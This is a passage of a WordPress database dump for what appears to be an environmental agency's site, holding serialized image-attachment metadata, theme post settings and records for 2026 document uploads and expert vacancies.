-19-at-10.53.29-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:340779;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-19-at-10.53.29-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:949328;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1920x1080.png\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2198037;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-19-at-10.53.29-600x394.png\";s:5:\"width\";i:600;s:6:\"height\";i:394;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:303776;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-19-at-10.53.29-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:530859;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-19-at-10.53.29-1280x640.png\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1022366;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38830,5835,'_last_editor_used_jetpack','classic-editor'),(38831,5835,'_edit_lock','1774338827:38'),(38832,5835,'_edit_last','38'),(38833,5836,'_wp_attached_file','2026/03/Screenshot-2026-03-19-at-10.53.29-1.png'),(38834,5836,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2160;s:6:\"height\";i:1420;s:4:\"file\";s:47:\"2026/03/Screenshot-2026-03-19-at-10.53.29-1.png\";s:8:\"filesize\";i:3918521;s:5:\"sizes\";a:17:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1-300x197.png\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:77245;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"Screenshot-2026-03-19-at-10.53.29-1-1024x673.png\";s:5:\"width\";i:1024;s:6:\"height\";i:673;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:835059;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31586;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1-768x505.png\";s:5:\"width\";i:768;s:6:\"height\";i:505;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:488978;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"Screenshot-2026-03-19-at-10.53.29-1-1536x1010.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1010;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1689935;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:49:\"Screenshot-2026-03-19-at-10.53.29-1-2048x1346.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1346;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2689292;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:129799;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-19-at-10.53.29-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18501;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:72806;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:216788;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:238060;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:340779;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:48:\"Screenshot-2026-03-19-at-10.53.29-1-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:949328;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:49:\"Screenshot-2026-03-19-at-10.53.29-1-1920x1080.png\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2198037;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1-600x394.png\";s:5:\"width\";i:600;s:6:\"height\";i:394;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:303776;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:47:\"Screenshot-2026-03-19-at-10.53.29-1-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:530859;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:48:\"Screenshot-2026-03-19-at-10.53.29-1-1280x640.png\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1022366;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38835,5837,'_wp_attached_file','2026/03/Waste-Service-Providers-List.pdf'),(38836,5837,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1190191;}'),(38837,5833,'_wp_page_template','default'),(38838,5833,'download_link',''),(38839,5833,'by','EPA/ERRS'),(38840,5833,'year','2026'),(38841,5833,'_pods_document_cover_image','a:1:{i:0;i:5836;}'),(38842,5833,'document_cover_image','5836'),(38843,5833,'_pods_attached_document','a:1:{i:0;i:5837;}'),(38844,5833,'attached_document','5837'),(38845,5840,'_last_editor_used_jetpack','classic-editor'),(38846,5840,'_edit_lock','1774380028:38'),(38847,5840,'_edit_last','38'),(38848,5840,'_wp_page_template','default'),(38849,5840,'closed_date','2026-03-27'),(38850,5840,'owner','EPA'),(38851,5840,'vacancy_link',''),(38852,5842,'_wp_attached_file','2026/03/REOI-Automation-of-ESIA-Process.pdf'),(38853,5842,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:452068;}'),(38856,5845,'_wp_attached_file','2026/03/today-news.jpeg'),(38857,5845,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:23:\"2026/03/today-news.jpeg\";s:8:\"filesize\";i:255655;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"today-news-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19649;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"today-news-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132821;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"today-news-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8047;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"today-news-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85219;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"today-news-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:244837;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"today-news-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26555;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:22:\"today-news-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5685;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:23:\"today-news-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15894;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:23:\"today-news-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38674;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:23:\"today-news-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42738;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:23:\"today-news-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56669;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:24:\"today-news-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135883;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:25:\"today-news-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:267068;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:23:\"today-news-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58691;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:23:\"today-news-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79133;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:24:\"today-news-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141760;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38951,5859,'_edit_last','38'),(38861,5844,'_edit_last','38'),(38860,5844,'_thumbnail_id','5845'),(38989,5865,'_edit_last','38'),(38864,5844,'kava_extra_enable_breadcrumbs','inherit'),(38865,5844,'post_formats',''),(38866,5844,'gallery_tab',''),(38867,5844,'kava_extra_gallery_images',''),(38868,5844,'link_tab',''),(38869,5844,'kava_extra_link',''),(38870,5844,'kava_extra_link_target','_blank'),(38871,5844,'quote_tab',''),(38872,5844,'kava_extra_quote_text',''),(38873,5844,'kava_extra_quote_cite',''),(38874,5844,'audio_tab',''),(38875,5844,'kava_extra_audio',''),(38876,5844,'kava_extra_audio_loop','false'),(38877,5844,'kava_extra_audio_autoplay','false'),(38878,5844,'kava_extra_audio_preload','false'),(38879,5844,'video_tab',''),(38880,5844,'kava_extra_video_type','library'),(38881,5844,'kava_extra_video_library',''),(38882,5844,'kava_extra_video_external',''),(38883,5844,'kava_extra_video_poster',''),(38884,5844,'kava_extra_video_width','770'),(38885,5844,'kava_extra_video_height','480'),(38886,5844,'kava_extra_video_loop','false'),(38887,5844,'kava_extra_video_autoplay','false'),(38888,5844,'kava_extra_video_preload','false'),(38889,5847,'_edit_lock','1774578125:38'),(38890,5847,'_last_editor_used_jetpack','block-editor'),(38891,5848,'_wp_attached_file','2026/03/yesterday-news.jpeg'),(38892,5848,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:27:\"2026/03/yesterday-news.jpeg\";s:8:\"filesize\";i:257542;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"yesterday-news-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15772;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"yesterday-news-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123065;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"yesterday-news-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6678;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"yesterday-news-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75497;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:29:\"yesterday-news-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:241869;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"yesterday-news-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21856;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:26:\"yesterday-news-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4808;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:27:\"yesterday-news-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13162;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:27:\"yesterday-news-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32783;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:27:\"yesterday-news-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36371;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:27:\"yesterday-news-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48200;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:28:\"yesterday-news-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125872;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:29:\"yesterday-news-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:265883;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:27:\"yesterday-news-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50073;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:27:\"yesterday-news-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70602;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:28:\"yesterday-news-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134009;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38897,5847,'_edit_last','38'),(38895,5847,'_wp_old_date','2026-03-27'),(38896,5847,'_thumbnail_id','5848'),(38900,5847,'kava_extra_enable_breadcrumbs','inherit'),(38901,5847,'post_formats',''),(38902,5847,'gallery_tab',''),(38903,5847,'kava_extra_gallery_images',''),(38904,5847,'link_tab',''),(38905,5847,'kava_extra_link',''),(38906,5847,'kava_extra_link_target','_blank'),(38907,5847,'quote_tab',''),(38908,5847,'kava_extra_quote_text',''),(38909,5847,'kava_extra_quote_cite',''),(38910,5847,'audio_tab',''),(38911,5847,'kava_extra_audio',''),(38912,5847,'kava_extra_audio_loop','false'),(38913,5847,'kava_extra_audio_autoplay','false'),(38914,5847,'kava_extra_audio_preload','false'),(38915,5847,'video_tab',''),(38916,5847,'kava_extra_video_type','library'),(38917,5847,'kava_extra_video_library',''),(38918,5847,'kava_extra_video_external',''),(38919,5847,'kava_extra_video_poster',''),(38920,5847,'kava_extra_video_width','770'),(38921,5847,'kava_extra_video_height','480'),(38922,5847,'kava_extra_video_loop','false'),(38923,5847,'kava_extra_video_autoplay','false'),(38924,5847,'kava_extra_video_preload','false'),(38925,5850,'_wp_attached_file','2026/03/Economics-and-Markets-Expert-27.docx'),(38926,5850,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:74670;}'),(38927,5799,'_wp_old_date','2026-03-05'),(38928,5852,'_wp_attached_file','2026/03/Screenshot-2026-03-27-at-14.34.06.png'),(38929,5852,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1596;s:6:\"height\";i:894;s:4:\"file\";s:45:\"2026/03/Screenshot-2026-03-27-at-14.34.06.png\";s:8:\"filesize\";i:2076532;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-27-at-14.34.06-300x168.png\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76403;}s:5:\"large\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-27-at-14.34.06-1024x574.png\";s:5:\"width\";i:1024;s:6:\"height\";i:574;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:719858;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-27-at-14.34.06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37408;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-27-at-14.34.06-768x430.png\";s:5:\"width\";i:768;s:6:\"height\";i:430;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:428411;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-27-at-14.34.06-1536x860.png\";s:5:\"width\";i:1536;s:6:\"height\";i:860;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1436371;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-27-at-14.34.06-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:139785;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:44:\"Screenshot-2026-03-27-at-14.34.06-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22152;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-27-at-14.34.06-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:79549;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-27-at-14.34.06-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:217327;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-27-at-14.34.06-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:239720;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-27-at-14.34.06-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:335446;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-27-at-14.34.06-1170x650.png\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:900703;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-27-at-14.34.06-600x336.png\";s:5:\"width\";i:600;s:6:\"height\";i:336;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:272416;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:45:\"Screenshot-2026-03-27-at-14.34.06-640x640.png\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:500448;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:46:\"Screenshot-2026-03-27-at-14.34.06-1280x640.png\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:939660;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38930,5853,'_wp_attached_file','2026/03/Gender-and-Social-Inclusion-Expert-27.docx'),(38931,5853,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:75613;}'),(38932,5812,'_wp_old_date','2026-03-05'),(38933,5855,'_last_editor_used_jetpack','classic-editor'),(38934,5855,'_edit_lock','1774626229:38'),(38935,5855,'_edit_last','38'),(38936,5855,'_wp_page_template','default'),(38937,5855,'closed_date','2026-04-02'),(38938,5855,'owner','EPA'),(38939,5855,'vacancy_link',''),(38940,5857,'_wp_attached_file','2026/03/Policy-Legal-and-Institutional-Expert-27.docx'),(38941,5857,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:81676;}'),(38942,5859,'_edit_lock','1776338980:38'),(38943,5859,'_last_editor_used_jetpack','block-editor'),(38944,5860,'_wp_attached_file','2026/04/news-today.jpeg'),(38945,5860,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2026/04/news-today.jpeg\";s:8:\"filesize\";i:151298;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"news-today-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15250;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"news-today-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118625;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"news-today-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6931;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"news-today-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70872;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"news-today-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20381;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:22:\"news-today-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4310;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:23:\"news-today-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13582;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:23:\"news-today-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32574;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:23:\"news-today-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39902;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:23:\"news-today-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45381;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:24:\"news-today-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116108;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:23:\"news-today-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46511;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:23:\"news-today-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74686;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:24:\"news-today-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122009;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1